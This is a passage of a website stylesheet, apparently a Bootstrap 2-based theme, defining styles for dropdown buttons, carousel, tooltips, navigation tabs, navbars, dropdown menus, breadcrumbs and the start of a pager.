.btn-group > .btn + .dropdown-toggle { *padding-top: 5px; padding-right: 8px; *padding-bottom: 5px; padding-left: 8px; -webkit-box-shadow: inset 1px 0 0 rgba(255, 255, 255, 0.125), inset 0 1px 0 rgba(255, 255, 255, 0.2), 0 1px 2px rgba(0, 0, 0, 0.05); -moz-box-shadow: inset 1px 0 0 rgba(255, 255, 255, 0.125), inset 0 1px 0 rgba(255, 255, 255, 0.2), 0 1px 2px rgba(0, 0, 0, 0.05); box-shadow: inset 1px 0 0 rgba(255, 255, 255, 0.125), inset 0 1px 0 rgba(255, 255, 255, 0.2), 0 1px 2px rgba(0, 0, 0, 0.05); } .btn-group > .btn-mini + .dropdown-toggle { *padding-top: 2px; padding-right: 5px; *padding-bottom: 2px; padding-left: 5px; } .btn-group > .btn-small + .dropdown-toggle { *padding-top: 5px; *padding-bottom: 4px; } .btn-group > .btn-large + .dropdown-toggle { *padding-top: 7px; padding-right: 12px; *padding-bottom: 7px; padding-left: 12px; } .btn-group.open .dropdown-toggle { background-image: none; -webkit-box-shadow: inset 0 2px 4px rgba(0, 0, 0, 0.15), 0 1px 2px rgba(0, 0, 0, 0.05); -moz-box-shadow: inset 0 2px 4px rgba(0, 0, 0, 0.15), 0 1px 2px rgba(0, 0, 0, 0.05); box-shadow: inset 0 2px 4px rgba(0, 0, 0, 0.15), 0 1px 2px rgba(0, 0, 0, 0.05); } .btn-group.open .btn.dropdown-toggle { background-color: #e6e6e6; } .btn-group.open .btn-primary.dropdown-toggle { background-color: #0044cc; } .btn-group.open .btn-warning.dropdown-toggle { background-color: #f89406; } .btn-group.open .btn-danger.dropdown-toggle { background-color: #bd362f; } .btn-group.open .btn-success.dropdown-toggle { background-color: #51a351; } .btn-group.open .btn-info.dropdown-toggle { background-color: #2f96b4; } .btn-group.open .btn-inverse.dropdown-toggle { background-color: #222222; } #author-info { overflow: hidden; margin-bottom: 20px; padding: 20px; } #author-info .author-text { padding-left: 90px; } #author-info h4 { margin: 0 0 5px; font-size: 18px; } #author-info .author-text p { font-size: 14px; line-height: 1.4; } #author-info img { float: left; } #author-info img { border-color: #e2e2e2; background: #fff; } .carousel { text-shadow: none; position: relative; margin-bottom: 20px; line-height: 1; } .carousel-inner { position: relative; width: 100%; overflow: hidden; } .carousel .item { position: relative; display: none; -webkit-transition: .6s ease-in-out left; -moz-transition: .6s ease-in-out left; -o-transition: .6s ease-in-out left; transition: .6s ease-in-out left; } .carousel .item > img { display: block; line-height: 1; padding: 0; border: 0; background: none; } .carousel .active, .carousel .next, .carousel .prev { display: block; } .carousel .active { left: 0; } .carousel .next, .carousel .prev { position: absolute; top: 0; width: 100%; } .carousel .next { left: 100%; } .carousel .prev { left: -100%; } .carousel .next.left, .carousel .prev.right { left: 0; } .carousel .active.left { left: -100%; } .carousel .active.right { left: 100%; } .carousel-control { font-family: "Helvetica Neue", Helvetica, Arial, sans-serif; position: absolute; top: 40%; left: 15px; width: 40px; height: 40px; margin-top: -20px; font-size: 60px; font-weight: 100; line-height: 24px; color: #fff; text-align: center; background: #222; border: 3px solid #fff !important; -webkit-border-radius: 23px; -moz-border-radius: 23px; border-radius: 23px; opacity: .5; filter: alpha(opacity=50); } .carousel-control.right { right: 15px; left: auto; } .carousel-control:hover { color: #fff; text-decoration: none; opacity: .9; filter: alpha(opacity=90); } .carousel-caption { position: absolute; right: 0; bottom: 0; left: 0; padding: 15px; background: #333; background: rgba(0, 0, 0, 0.75); } .carousel-caption h4, .carousel-caption p { font-size: 14px; line-height: 20px; color: #fff; } .carousel-caption h4 { font-size: 18px; margin: 0 0 5px; } .carousel-caption p { margin-bottom: 0; } .tooltip { text-shadow: none; position: absolute; z-index: 1030; display: block; padding: 5px; font-size: 13px; opacity: 0; filter: alpha(opacity=0); visibility: visible; } .tooltip.in { opacity: .8; filter: alpha(opacity=80); } .tooltip.top { margin-top: -3px; } .tooltip.right { margin-left: 3px; } .tooltip.bottom { margin-top: 3px; } .tooltip.left { margin-left: -3px; } .tooltip-inner { max-width: 200px; padding: 3px 8px; color: #fff; text-align: center; text-decoration: none; background-color: #000; -webkit-border-radius: 4px; -moz-border-radius: 4px; border-radius: 4px; } .tooltip-arrow { position: absolute; width: 0; height: 0; border-color: transparent; border-style: solid; } .tooltip.top .tooltip-arrow { bottom: 0; left: 50%; margin-left: -5px; border-top-color: #000; border-width: 5px 5px 0; } .tooltip.right .tooltip-arrow { top: 50%; left: 0; margin-top: -5px; border-right-color: #000; border-width: 5px 5px 5px 0; } .tooltip.left .tooltip-arrow { top: 50%; right: 0; margin-top: -5px; border-left-color: #000; border-width: 5px 0 5px 5px; } .tooltip.bottom .tooltip-arrow { top: 0; left: 50%; margin-left: -5px; border-bottom-color: #000; border-width: 0 5px 5px; } .fade { opacity: 0; -webkit-transition: opacity .15s linear; -moz-transition: opacity .15s linear; -o-transition: opacity .15s linear; transition: opacity .15s linear; } .fade.in { opacity: 1; } a[rel="tooltip"] { text-decoration: none; } .nav { margin-bottom: 0; margin-left: 0; list-style: none; } .nav > li > a { display: block; text-decoration: none; } .nav > li > a:hover { text-decoration: none; background-color: #eee; } .nav > .pull-right { float: right; } .nav-tabs, .nav-pills { *zoom: 1; } .nav-tabs:before, .nav-pills:before, .nav-tabs:after, .nav-pills:after { display: table; line-height: 0; content: ""; } .nav-tabs:after, .nav-pills:after { clear: both; } .nav-tabs > li, .nav-pills > li { float: left; padding: 0; } .nav-tabs > li > a, .nav-pills > li > a { padding-right: 12px; padding-left: 12px; margin-right: 2px; line-height: 14px; } .nav-tabs { padding: 0; border-bottom: 1px solid #ccc; } .nav-tabs > li { margin-bottom: -1px; } .nav-tabs > li > a { padding-top: 8px; padding-bottom: 8px; line-height: 20px; border: 1px solid transparent; -webkit-border-radius: 4px 4px 0 0; -moz-border-radius: 4px 4px 0 0; border-radius: 4px 4px 0 0; } .nav-tabs > li > a:hover { border-color: #eee #eee #ddd; } .nav-tabs > .active > a, .nav-tabs > .active > a:hover { color: #555; cursor: default; background-color: #fff; border: 1px solid #ccc; border-bottom-color: transparent; } .nav-pills > li > a { padding-top: 8px; padding-bottom: 8px; margin-top: 2px; margin-bottom: 2px; -webkit-border-radius: 5px; -moz-border-radius: 5px; border-radius: 5px; } .nav-pills > .active > a, .nav-pills > .active > a:hover { color: #fff; background-color: #08c; } .nav-stacked > li { float: none; } .nav-stacked > li > a { margin-right: 0; } .nav-tabs.nav-stacked { border-bottom: 0; } .nav-tabs.nav-stacked > li > a { border: 1px solid #ddd; -webkit-border-radius: 0; -moz-border-radius: 0; border-radius: 0; } .nav-tabs.nav-stacked > li:first-child > a { -webkit-border-top-right-radius: 4px; border-top-right-radius: 4px; -webkit-border-top-left-radius: 4px; border-top-left-radius: 4px; -moz-border-radius-topright: 4px; -moz-border-radius-topleft: 4px; } .nav-tabs.nav-stacked > li:last-child > a { -webkit-border-bottom-right-radius: 4px; border-bottom-right-radius: 4px; -webkit-border-bottom-left-radius: 4px; border-bottom-left-radius: 4px; -moz-border-radius-bottomright: 4px; -moz-border-radius-bottomleft: 4px; } .nav-tabs.nav-stacked > li > a:hover { z-index: 2; border-color: #ddd; } .nav-pills.nav-stacked > li > a { margin-bottom: 3px; } .nav-pills.nav-stacked > li:last-child > a { margin-bottom: 1px; } .nav-tabs .dropdown-menu { -webkit-border-radius: 0 0 6px 6px; -moz-border-radius: 0 0 6px 6px; border-radius: 0 0 6px 6px; } .nav-pills .dropdown-menu { -webkit-border-radius: 6px; -moz-border-radius: 6px; border-radius: 6px; } .nav .dropdown-toggle .caret { margin-top: 6px; border-top-color: #08c; border-bottom-color: #08c; } .nav .dropdown-toggle:hover .caret { border-top-color: #005580; border-bottom-color: #005580; } .nav-tabs .dropdown-toggle .caret { margin-top: 8px; } .nav .active .dropdown-toggle .caret { border-top-color: #fff; border-bottom-color: #fff; } .nav-tabs .active .dropdown-toggle .caret { border-top-color: #555; border-bottom-color: #555; } .nav > .dropdown.active > a:hover { cursor: pointer; } .nav-tabs .open .dropdown-toggle, .nav-pills .open .dropdown-toggle, .nav > li.dropdown.open.active > a:hover { color: #fff; background-color: #999; border-color: #999; } .nav li.dropdown.open .caret, .nav li.dropdown.open.active .caret, .nav li.dropdown.open a:hover .caret { border-top-color: #fff; border-bottom-color: #fff; opacity: 1; filter: alpha(opacity=100); } .tabs-stacked .open > a:hover { border-color: #999999; } .tabbable { *zoom: 1; } .tabbable:before, .tabbable:after { display: table; line-height: 0; content: ""; } .tabbable:after { clear: both; } .tab-content { margin-bottom: 1em; font-size: 14px; padding: 10px; background: #fff; border: 1px solid #ccc; border-top: 0; overflow: auto; } .tabs-below > .nav-tabs, .tabs-right > .nav-tabs, .tabs-left > .nav-tabs { border-bottom: 0; } .tab-content > .tab-pane, .pill-content > .pill-pane { display: none; } .tab-content > .active, .pill-content > .active { display: block; } .tabs-below > .nav-tabs { border-top: 1px solid #ddd; } .tabs-below > .nav-tabs > li { margin-top: -1px; margin-bottom: 0; } .tabs-below > .nav-tabs > li > a { -webkit-border-radius: 0 0 4px 4px; -moz-border-radius: 0 0 4px 4px; border-radius: 0 0 4px 4px; } .tabs-below > .nav-tabs > li > a:hover { border-top-color: #ddd; border-bottom-color: transparent; } .tabs-below > .nav-tabs > .active > a, .tabs-below > .nav-tabs > .active > a:hover { border-color: transparent #ddd #ddd #ddd; } .tabs-left > .nav-tabs > li, .tabs-right > .nav-tabs > li { float: none; } .tabs-left > .nav-tabs > li > a, .tabs-right > .nav-tabs > li > a { min-width: 74px; margin-right: 0; margin-bottom: 3px; } .tabs-left > .nav-tabs { float: left; margin-right: 19px; border-right: 1px solid #ddd; } .tabs-left > .nav-tabs > li > a { margin-right: -1px; -webkit-border-radius: 4px 0 0 4px; -moz-border-radius: 4px 0 0 4px; border-radius: 4px 0 0 4px; } .tabs-left > .nav-tabs > li > a:hover { border-color: #eee #ddd #eee #eee; } .tabs-left > .nav-tabs .active > a, .tabs-left > .nav-tabs .active > a:hover { border-color: #ddd transparent #ddd #ddd; *border-right-color: #fff; } .tabs-right > .nav-tabs { float: right; margin-left: 19px; border-left: 1px solid #ddd; } .tabs-right > .nav-tabs > li > a { margin-left: -1px; -webkit-border-radius: 0 4px 4px 0; -moz-border-radius: 0 4px 4px 0; border-radius: 0 4px 4px 0; } .tabs-right > .nav-tabs > li > a:hover { border-color: #eee #eee #eee #ddd; } .tabs-right > .nav-tabs .active > a, .tabs-right > .nav-tabs .active > a:hover { border-color: #ddd #ddd #ddd transparent; *border-left-color: #fff; } .nav > .disabled > a { color: #999; } .nav > .disabled > a:hover { text-decoration: none; cursor: default; background-color: transparent; } .navbar { overflow: visible; margin-bottom: 20px; *position: relative; *z-index: 2; } .navbar-inner { min-height: 40px; padding-left: 20px; padding-right: 20px; background-color: #fafafa; background-image: -moz-linear-gradient(top, white, #f2f2f2); background-image: -webkit-gradient(linear, 0 0, 0 100%, from(white), to(#f2f2f2)); background-image: -webkit-linear-gradient(top, white, #f2f2f2); background-image: -o-linear-gradient(top, white, #f2f2f2); background-image: linear-gradient(to bottom, #ffffff, #f2f2f2); background-repeat: repeat-x; filter: progid:DXImageTransform.Microsoft.gradient(startColorstr='#ffffffff', endColorstr='#fff2f2f2', GradientType=0); border: 1px solid #d4d4d4; -webkit-border-radius: 4px; -moz-border-radius: 4px; border-radius: 4px; -webkit-box-shadow: 0 1px 4px rgba(0, 0, 0, 0.065); -moz-box-shadow: 0 1px 4px rgba(0, 0, 0, 0.065); box-shadow: 0 1px 4px rgba(0, 0, 0, 0.065); *zoom: 1; } .navbar-inner:before, .navbar-inner:after { display: table; content: ""; line-height: 0; } .navbar-inner:after { clear: both; } .navbar .container { width: auto; } .nav-collapse.collapse { height: auto; overflow: visible; } .navbar .brand { float: left; display: block; padding: 10px 20px 10px; margin-left: -20px; font-size: 20px; font-weight: 200; color: #777777; text-shadow: 0 1px 0 #ffffff; } .navbar .brand:hover, .navbar .brand:focus { text-decoration: none; } .navbar-text { margin-bottom: 0; line-height: 40px; color: #777777; } .navbar-link { color: #777777; } .navbar-link:hover, .navbar-link:focus { color: #333333; } .navbar .divider-vertical { height: 40px; margin: 0 9px; border-left: 1px solid #f2f2f2; border-right: 1px solid #ffffff; } .navbar .btn, .navbar .btn-group { margin-top: 5px; } .navbar .btn-group .btn, .navbar .input-prepend .btn, .navbar .input-append .btn, .navbar .input-prepend .btn-group, .navbar .input-append .btn-group { margin-top: 0; } .navbar-form { margin-bottom: 0; *zoom: 1; } .navbar-form:before, .navbar-form:after { display: table; content: ""; line-height: 0; } .navbar-form:after { clear: both; } .navbar-form input, .navbar-form select, .navbar-form .radio, .navbar-form .checkbox { margin-top: 5px; } .navbar-form input, .navbar-form select, .navbar-form .btn { display: inline-block; margin-bottom: 0; } .navbar-form input[type="image"], .navbar-form input[type="checkbox"], .navbar-form input[type="radio"] { margin-top: 3px; } .navbar-form .input-append, .navbar-form .input-prepend { margin-top: 5px; white-space: nowrap; } .navbar-form .input-append input, .navbar-form .input-prepend input { margin-top: 0; } .navbar-search { position: relative; float: left; margin-top: 5px; margin-bottom: 0; } .navbar-search .search-query { margin-bottom: 0; padding: 4px 14px; font-family: "Helvetica Neue", Helvetica, Arial, sans-serif; font-size: 13px; font-weight: normal; line-height: 1; -webkit-border-radius: 15px; -moz-border-radius: 15px; border-radius: 15px; } .navbar-static-top { position: static; margin-bottom: 0; } .navbar-static-top .navbar-inner { -webkit-border-radius: 0; -moz-border-radius: 0; border-radius: 0; } .navbar-fixed-top, .navbar-fixed-bottom { position: fixed; right: 0; left: 0; z-index: 1030; margin-bottom: 0; } .navbar-fixed-top .navbar-inner, .navbar-static-top .navbar-inner { border-width: 0 0 1px; } .navbar-fixed-bottom .navbar-inner { border-width: 1px 0 0; } .navbar-fixed-top .navbar-inner, .navbar-fixed-bottom .navbar-inner { padding-left: 0; padding-right: 0; -webkit-border-radius: 0; -moz-border-radius: 0; border-radius: 0; } .navbar-static-top .container, .navbar-fixed-top .container, .navbar-fixed-bottom .container { width: 940px; } .navbar-fixed-top { top: 0; } .navbar-fixed-top .navbar-inner, .navbar-static-top .navbar-inner { -webkit-box-shadow: 0 1px 10px rgba(0, 0, 0, 0.1); -moz-box-shadow: 0 1px 10px rgba(0, 0, 0, 0.1); box-shadow: 0 1px 10px rgba(0, 0, 0, 0.1); } .navbar-fixed-bottom { bottom: 0; } .navbar-fixed-bottom .navbar-inner { -webkit-box-shadow: 0 -1px 10px rgba(0, 0, 0, 0.1); -moz-box-shadow: 0 -1px 10px rgba(0, 0, 0, 0.1); box-shadow: 0 -1px 10px rgba(0, 0, 0, 0.1); } .navbar .nav { position: relative; left: 0; display: block; float: left; margin: 0 10px 0 0; } .navbar .nav.pull-right { float: right; margin-right: 0; } .navbar .nav > li { float: left; } .navbar .nav > li > a { float: none; padding: 10px 15px 10px; color: #777777; text-decoration: none; text-shadow: 0 1px 0 #ffffff; } .navbar .nav .dropdown-toggle .caret { margin-top: 8px; } .navbar .nav > li > a:focus, .navbar .nav > li > a:hover { background-color: transparent; color: #333333; text-decoration: none; } .navbar .nav > .active > a, .navbar .nav > .active > a:hover, .navbar .nav > .active > a:focus { color: #555555; text-decoration: none; background-color: #e5e5e5; -webkit-box-shadow: inset 0 3px 8px rgba(0, 0, 0, 0.125); -moz-box-shadow: inset 0 3px 8px rgba(0, 0, 0, 0.125); box-shadow: inset 0 3px 8px rgba(0, 0, 0, 0.125); } .navbar .btn-navbar { display: none; float: right; padding: 7px 10px; margin-left: 5px; margin-right: 5px; color: #ffffff; text-shadow: 0 -1px 0 rgba(0, 0, 0, 0.25); background-color: #ededed; background-image: -moz-linear-gradient(top, #f2f2f2, #e5e5e5); background-image: -webkit-gradient(linear, 0 0, 0 100%, from(#f2f2f2), to(#e5e5e5)); background-image: -webkit-linear-gradient(top, #f2f2f2, #e5e5e5); background-image: -o-linear-gradient(top, #f2f2f2, #e5e5e5); background-image: linear-gradient(to bottom, #f2f2f2, #e5e5e5); background-repeat: repeat-x; filter: progid:DXImageTransform.Microsoft.gradient(startColorstr='#fff2f2f2', endColorstr='#ffe5e5e5', GradientType=0); border-color: #e5e5e5 #e5e5e5 #bfbfbf; border-color: rgba(0, 0, 0, 0.1) rgba(0, 0, 0, 0.1) rgba(0, 0, 0, 0.25); *background-color: #e5e5e5; filter: progid:DXImageTransform.Microsoft.gradient(enabled = false); -webkit-box-shadow: inset 0 1px 0 rgba(255, 255, 255, 0.1), 0 1px 0 rgba(255, 255, 255, 0.075); -moz-box-shadow: inset 0 1px 0 rgba(255, 255, 255, 0.1), 0 1px 0 rgba(255, 255, 255, 0.075); box-shadow: inset 0 1px 0 rgba(255, 255, 255, 0.1), 0 1px 0 rgba(255, 255, 255, 0.075); } .navbar .btn-navbar:hover, .navbar .btn-navbar:focus, .navbar .btn-navbar:active, .navbar .btn-navbar.active, .navbar .btn-navbar.disabled, .navbar .btn-navbar[disabled] { color: #ffffff; background-color: #e5e5e5; *background-color: #d9d9d9; } .navbar .btn-navbar:active, .navbar .btn-navbar.active { background-color: #cccccc \9; } .navbar .btn-navbar .icon-bar { display: block; width: 18px; height: 2px; background-color: #f5f5f5; -webkit-border-radius: 1px; -moz-border-radius: 1px; border-radius: 1px; -webkit-box-shadow: 0 1px 0 rgba(0, 0, 0, 0.25); -moz-box-shadow: 0 1px 0 rgba(0, 0, 0, 0.25); box-shadow: 0 1px 0 rgba(0, 0, 0, 0.25); } .btn-navbar .icon-bar + .icon-bar { margin-top: 3px; } .navbar .nav > li > .dropdown-menu:before { content: ''; display: inline-block; border-left: 7px solid transparent; border-right: 7px solid transparent; border-bottom: 7px solid #ccc; border-bottom-color: rgba(0, 0, 0, 0.2); position: absolute; top: -7px; left: 9px; } .navbar .nav > li > .dropdown-menu:after { content: ''; display: inline-block; border-left: 6px solid transparent; border-right: 6px solid transparent; border-bottom: 6px solid #ffffff; position: absolute; top: -6px; left: 10px; } .navbar-fixed-bottom .nav > li > .dropdown-menu:before { border-top: 7px solid #ccc; border-top-color: rgba(0, 0, 0, 0.2); border-bottom: 0; bottom: -7px; top: auto; } .navbar-fixed-bottom .nav > li > .dropdown-menu:after { border-top: 6px solid #ffffff; border-bottom: 0; bottom: -6px; top: auto; } .navbar .nav li.dropdown > a:hover .caret, .navbar .nav li.dropdown > a:focus .caret { border-top-color: #333333; border-bottom-color: #333333; } .navbar .nav li.dropdown.open > .dropdown-toggle, .navbar .nav li.dropdown.active > .dropdown-toggle, .navbar .nav li.dropdown.open.active > .dropdown-toggle { background-color: #e5e5e5; color: #555555; } .navbar .nav li.dropdown > .dropdown-toggle .caret { border-top-color: #777777; border-bottom-color: #777777; } .navbar .nav li.dropdown.open > .dropdown-toggle .caret, .navbar .nav li.dropdown.active > .dropdown-toggle .caret, .navbar .nav li.dropdown.open.active > .dropdown-toggle .caret { border-top-color: #555555; border-bottom-color: #555555; } .navbar .pull-right > li > .dropdown-menu, .navbar .nav > li > .dropdown-menu.pull-right { left: auto; right: 0; } .navbar .pull-right > li > .dropdown-menu:before, .navbar .nav > li > .dropdown-menu.pull-right:before { left: auto; right: 12px; } .navbar .pull-right > li > .dropdown-menu:after, .navbar .nav > li > .dropdown-menu.pull-right:after { left: auto; right: 13px; } .navbar .pull-right > li > .dropdown-menu .dropdown-menu, .navbar .nav > li > .dropdown-menu.pull-right .dropdown-menu { left: auto; right: 100%; margin-left: 0; margin-right: -1px; -webkit-border-radius: 6px 0 6px 6px; -moz-border-radius: 6px 0 6px 6px; border-radius: 6px 0 6px 6px; } .navbar-inverse .navbar-inner { background-color: #1b1b1b; background-image: -moz-linear-gradient(top, #222222, #111111); background-image: -webkit-gradient(linear, 0 0, 0 100%, from(#222222), to(#111111)); background-image: -webkit-linear-gradient(top, #222222, #111111); background-image: -o-linear-gradient(top, #222222, #111111); background-image: linear-gradient(to bottom, #222222, #111111); background-repeat: repeat-x; filter: progid:DXImageTransform.Microsoft.gradient(startColorstr='#ff222222', endColorstr='#ff111111', GradientType=0); border-color: #252525; } .navbar-inverse .brand, .navbar-inverse .nav > li > a { color: #999999; text-shadow: 0 -1px 0 rgba(0, 0, 0, 0.25); } .navbar-inverse .brand:hover, .navbar-inverse .nav > li > a:hover, .navbar-inverse .brand:focus, .navbar-inverse .nav > li > a:focus { color: #ffffff; } .navbar-inverse .brand { color: #999999; } .navbar-inverse .navbar-text { color: #999999; } .navbar-inverse .nav > li > a:focus, .navbar-inverse .nav > li > a:hover { background-color: transparent; color: #ffffff; } .navbar-inverse .nav .active > a, .navbar-inverse .nav .active > a:hover, .navbar-inverse .nav .active > a:focus { color: #ffffff; background-color: #111111; } .navbar-inverse .navbar-link { color: #999999; } .navbar-inverse .navbar-link:hover, .navbar-inverse .navbar-link:focus { color: #ffffff; } .navbar-inverse .divider-vertical { border-left-color: #111111; border-right-color: #222222; } .navbar-inverse .nav li.dropdown.open > .dropdown-toggle, .navbar-inverse .nav li.dropdown.active > .dropdown-toggle, .navbar-inverse .nav li.dropdown.open.active > .dropdown-toggle { background-color: #111111; color: #ffffff; } .navbar-inverse .nav li.dropdown > a:hover .caret, .navbar-inverse .nav li.dropdown > a:focus .caret { border-top-color: #ffffff; border-bottom-color: #ffffff; } .navbar-inverse .nav li.dropdown > .dropdown-toggle .caret { border-top-color: #999999; border-bottom-color: #999999; } .navbar-inverse .nav li.dropdown.open > .dropdown-toggle .caret, .navbar-inverse .nav li.dropdown.active > .dropdown-toggle .caret, .navbar-inverse .nav li.dropdown.open.active > .dropdown-toggle .caret { border-top-color: #ffffff; border-bottom-color: #ffffff; } .navbar-inverse .navbar-search .search-query { color: #ffffff; background-color: #515151; border-color: #111111; -webkit-box-shadow: inset 0 1px 2px rgba(0, 0, 0, 0.1), 0 1px 0 rgba(255, 255, 255, 0.15); -moz-box-shadow: inset 0 1px 2px rgba(0, 0, 0, 0.1), 0 1px 0 rgba(255, 255, 255, 0.15); box-shadow: inset 0 1px 2px rgba(0, 0, 0, 0.1), 0 1px 0 rgba(255, 255, 255, 0.15); -webkit-transition: none; -moz-transition: none; -o-transition: none; transition: none; } .navbar-inverse .navbar-search .search-query:-moz-placeholder { color: #cccccc; } .navbar-inverse .navbar-search .search-query:-ms-input-placeholder { color: #cccccc; } .navbar-inverse .navbar-search .search-query::-webkit-input-placeholder { color: #cccccc; } .navbar-inverse .navbar-search .search-query:focus, .navbar-inverse .navbar-search .search-query.focused { padding: 5px 15px; color: #333333; text-shadow: 0 1px 0 #ffffff; background-color: #ffffff; border: 0; -webkit-box-shadow: 0 0 3px rgba(0, 0, 0, 0.15); -moz-box-shadow: 0 0 3px rgba(0, 0, 0, 0.15); box-shadow: 0 0 3px rgba(0, 0, 0, 0.15); outline: 0; } .navbar-inverse .btn-navbar { color: #ffffff; text-shadow: 0 -1px 0 rgba(0, 0, 0, 0.25); background-color: #0e0e0e; background-image: -moz-linear-gradient(top, #151515, #040404); background-image: -webkit-gradient(linear, 0 0, 0 100%, from(#151515), to(#040404)); background-image: -webkit-linear-gradient(top, #151515, #040404); background-image: -o-linear-gradient(top, #151515, #040404); background-image: linear-gradient(to bottom, #151515, #040404); background-repeat: repeat-x; filter: progid:DXImageTransform.Microsoft.gradient(startColorstr='#ff151515', endColorstr='#ff040404', GradientType=0); border-color: #040404 #040404 #000000; border-color: rgba(0, 0, 0, 0.1) rgba(0, 0, 0, 0.1) rgba(0, 0, 0, 0.25); *background-color: #040404; filter: progid:DXImageTransform.Microsoft.gradient(enabled = false); } .navbar-inverse .btn-navbar:hover, .navbar-inverse .btn-navbar:focus, .navbar-inverse .btn-navbar:active, .navbar-inverse .btn-navbar.active, .navbar-inverse .btn-navbar.disabled, .navbar-inverse .btn-navbar[disabled] { color: #ffffff; background-color: #040404; *background-color: #000000; } .navbar-inverse .btn-navbar:active, .navbar-inverse .btn-navbar.active { background-color: #000000 \9; } .dropup, .dropdown { position: relative; } .dropdown-toggle { *margin-bottom: -3px; } .dropdown-toggle:active, .open .dropdown-toggle { outline: 0; } .caret { display: inline-block; width: 0; height: 0; vertical-align: top; border-top: 4px solid #000000; border-right: 4px solid transparent; border-left: 4px solid transparent; content: ""; } .dropdown .caret { margin-top: 8px; margin-left: 2px; } .dropdown-menu { position: absolute; top: 100%; left: 0; z-index: 1000; display: none; float: left; min-width: 160px; padding: 5px 0; margin: 2px 0 0; list-style: none; background-color: #ffffff; border: 1px solid #ccc; border: 1px solid rgba(0, 0, 0, 0.2); *border-right-width: 2px; *border-bottom-width: 2px; -webkit-border-radius: 6px; -moz-border-radius: 6px; border-radius: 6px; -webkit-box-shadow: 0 5px 10px rgba(0, 0, 0, 0.2); -moz-box-shadow: 0 5px 10px rgba(0, 0, 0, 0.2); box-shadow: 0 5px 10px rgba(0, 0, 0, 0.2); -webkit-background-clip: padding-box; -moz-background-clip: padding; background-clip: padding-box; } .dropdown-menu.pull-right { right: 0; left: auto; } .dropdown-menu .divider { *width: 100%; height: 1px; margin: 9px 1px; *margin: -5px 0 5px; overflow: hidden; background-color: #e5e5e5; border-bottom: 1px solid #ffffff; } .dropdown-menu > li > a { display: block; padding: 3px 20px; clear: both; font-weight: normal; line-height: 20px; color: #333333; white-space: nowrap; } .dropdown-menu > li > a:hover, .dropdown-menu > li > a:focus, .dropdown-submenu:hover > a, .dropdown-submenu:focus > a { text-decoration: none; color: #ffffff; background-color: #0081c2; background-image: -moz-linear-gradient(top, #0088cc, #0077b3); background-image: -webkit-gradient(linear, 0 0, 0 100%, from(#0088cc), to(#0077b3)); background-image: -webkit-linear-gradient(top, #0088cc, #0077b3); background-image: -o-linear-gradient(top, #0088cc, #0077b3); background-image: linear-gradient(to bottom, #0088cc, #0077b3); background-repeat: repeat-x; filter: progid:DXImageTransform.Microsoft.gradient(startColorstr='#ff0088cc', endColorstr='#ff0077b3', GradientType=0); } .dropdown-menu > .active > a, .dropdown-menu > .active > a:hover, .dropdown-menu > .active > a:focus { color: #ffffff; text-decoration: none; outline: 0; background-color: #0081c2; background-image: -moz-linear-gradient(top, #0088cc, #0077b3); background-image: -webkit-gradient(linear, 0 0, 0 100%, from(#0088cc), to(#0077b3)); background-image: -webkit-linear-gradient(top, #0088cc, #0077b3); background-image: -o-linear-gradient(top, #0088cc, #0077b3); background-image: linear-gradient(to bottom, #0088cc, #0077b3); background-repeat: repeat-x; filter: progid:DXImageTransform.Microsoft.gradient(startColorstr='#ff0088cc', endColorstr='#ff0077b3', GradientType=0); } .dropdown-menu > .disabled > a, .dropdown-menu > .disabled > a:hover, .dropdown-menu > .disabled > a:focus { color: #999999; } .dropdown-menu > .disabled > a:hover, .dropdown-menu > .disabled > a:focus { text-decoration: none; background-color: transparent; background-image: none; filter: progid:DXImageTransform.Microsoft.gradient(enabled = false); cursor: default; } .open { *z-index: 1000; } .open > .dropdown-menu { display: block; } .dropdown-backdrop { position: fixed; left: 0; right: 0; bottom: 0; top: 0; z-index: 990; } .pull-right > .dropdown-menu { right: 0; left: auto; } .dropup .caret, .navbar-fixed-bottom .dropdown .caret { border-top: 0; border-bottom: 4px solid #000000; content: ""; } .dropup .dropdown-menu, .navbar-fixed-bottom .dropdown .dropdown-menu { top: auto; bottom: 100%; margin-bottom: 1px; } .dropdown-submenu { position: relative; } .dropdown-submenu > .dropdown-menu { top: 0; left: 100%; margin-top: -6px; margin-left: -1px; -webkit-border-radius: 0 6px 6px 6px; -moz-border-radius: 0 6px 6px 6px; border-radius: 0 6px 6px 6px; } .dropdown-submenu:hover > .dropdown-menu { display: block; } .dropup .dropdown-submenu > .dropdown-menu { top: auto; bottom: 0; margin-top: 0; margin-bottom: -2px; -webkit-border-radius: 5px 5px 5px 0; -moz-border-radius: 5px 5px 5px 0; border-radius: 5px 5px 5px 0; } .dropdown-submenu > a:after { display: block; content: " "; float: right; width: 0; height: 0; border-color: transparent; border-style: solid; border-width: 5px 0 5px 5px; border-left-color: #cccccc; margin-top: 5px; margin-right: -10px; } .dropdown-submenu:hover > a:after { border-left-color: #ffffff; } .dropdown-submenu.pull-left { float: none; } .dropdown-submenu.pull-left > .dropdown-menu { left: -100%; margin-left: 10px; -webkit-border-radius: 6px 0 6px 6px; -moz-border-radius: 6px 0 6px 6px; border-radius: 6px 0 6px 6px; } .dropdown .dropdown-menu .nav-header { padding-left: 20px; padding-right: 20px; } .typeahead { z-index: 1051; margin-top: 2px; -webkit-border-radius: 4px; -moz-border-radius: 4px; border-radius: 4px; } .widetext { visibility: hidden; margin: 0; line-height: 1; } .wtext { white-space: nowrap; display: inline-block; } .breadcrumb { font-size: 12px; padding: 7px 14px; margin: 0 0 25px; list-style: none; background-color: #fbfbfb; background-image: -moz-linear-gradient(top, white, whitesmoke); background-image: -ms-linear-gradient(top, white, whitesmoke); background-image: -webkit-gradient(linear, 0 0, 0 100%, from(white), to(whitesmoke)); background-image: -webkit-linear-gradient(top, white, whitesmoke); background-image: -o-linear-gradient(top, white, whitesmoke); background-image: linear-gradient(top, #ffffff, #f5f5f5); background-repeat: repeat-x; filter: progid:DXImageTransform.Microsoft.gradient(startColorstr='#ffffff',endColorstr='#f5f5f5',GradientType=0); border: 1px solid #ddd; -webkit-border-radius: 3px; -moz-border-radius: 3px; border-radius: 3px; -webkit-box-shadow: inset 0 1px 0 #fff; -moz-box-shadow: inset 0 1px 0 #fff; box-shadow: inset 0 1px 0 #fff; } .breadcrumb li { display: inline-block; *display: inline; *zoom: 1; text-shadow: 0 1px 0 #fff; } .breadcrumb .divider { padding: 0 5px; color: #999; } .breadcrumb .active a { color: #333; } .pager { margin-left: 0; margin-bottom: 18px; list-style: none; text-align: center; *zoom: 1; } .pager:before, .pager:after { display: table; content: ""; } .pager:after { clear: both; } .pager a { display: inline-block; padding: 5px 14px; background-color: #fff; border: 1px solid #ddd; 